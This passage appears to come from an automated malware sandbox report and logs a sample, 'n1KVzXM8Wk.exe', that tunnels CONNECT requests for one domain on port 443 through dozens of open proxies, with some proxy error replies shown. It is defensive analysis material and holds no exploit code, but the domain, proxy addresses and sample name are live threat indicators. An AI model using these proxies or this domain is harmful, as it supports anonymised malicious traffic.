                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.740827084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.769599915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1649192.168.2.45448360.188.102.225180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.727572918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1650192.168.2.4546618.222.145.238156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.727854013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1651192.168.2.454659103.118.46.17480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.727946043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1652192.168.2.45446198.162.25.4316546812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.748956919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1653192.168.2.454655116.107.182.4110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.753353119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1654192.168.2.452553201.184.159.2856786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.809748888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1655192.168.2.454688138.68.60.880806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.848557949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.021662951 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1656192.168.2.454182171.248.213.12110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.849104881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1657192.168.2.454662103.83.232.122806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.849195957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.223793983 CET343INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 182
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1658192.168.2.454675211.222.252.18781976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.859474897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1659192.168.2.454694185.158.114.14265866812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.861093998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1660192.168.2.454698141.94.174.6378766812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.880249023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1661192.168.2.452551103.165.155.16311116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.891285896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1662192.168.2.452675150.136.251.24806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.896760941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.025022984 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1663192.168.2.45380945.117.179.179147916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.902915955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680377007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.865864038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.975210905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.178329945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1664192.168.2.454184142.54.239.141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.907409906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1665192.168.2.452484111.20.217.17890916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.916390896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.560441017 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.1
                                                                                                      Date: Fri, 23 Feb 2024 08:44:53 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1666192.168.2.45468045.251.231.11356786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.916399002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1667192.168.2.454679103.204.54.5010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.949796915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1668192.168.2.454701209.14.112.110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.957993984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1669192.168.2.454717192.252.216.8141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.029285908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1670192.168.2.45472645.43.83.18864716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.038155079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.378705025 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                                      Proxy-Connection: close
                                                                                                      X-Webshare-Error: 407
                                                                                                      X-Webshare-Reason: invalidpassword
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Length: 121
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                                      Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1671192.168.2.45280267.205.162.103631776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.065088987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1672192.168.2.453899212.110.188.204344116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.101661921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.147058010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.147294998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.146984100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.146791935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1673192.168.2.453854164.132.170.100806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.102015972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.147090912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.147299051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.147003889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.146830082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:06.146760941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:18.189138889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1674192.168.2.452695159.223.71.71625726812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.102138042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.975037098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.365870953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.866321087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1675192.168.2.45273051.255.79.114126826812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.102262974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.147099018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1676192.168.2.45476843.153.55.2054436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.108172894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1677192.168.2.45276937.187.135.60184726812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.109025955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1678192.168.2.45388688.87.72.13441456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.231476068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1679192.168.2.454571178.207.8.2031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.232821941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.317037106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.348205090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.443906069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.959086895 CET202INHTTP/1.0 403 Forbidden
                                                                                                      Content-Length: 791
                                                                                                      Content-Type: text/html
                                                                                                      Date: Fri, 23 Feb 2024 08:45:46 GMT
                                                                                                      Expires: Fri, 23 Feb 2024 08:45:46 GMT
                                                                                                      Server: Mikrotik HttpProxy
                                                                                                      Proxy-Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1680192.168.2.454712175.183.82.22181936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.232898951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1681192.168.2.454710106.14.249.8180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.233086109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.579174042 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1682192.168.2.454760104.225.220.233806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.233376026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.127214909 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Server: Apache/2.4.29 (Ubuntu)
                                                                                                      Content-Length: 639
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
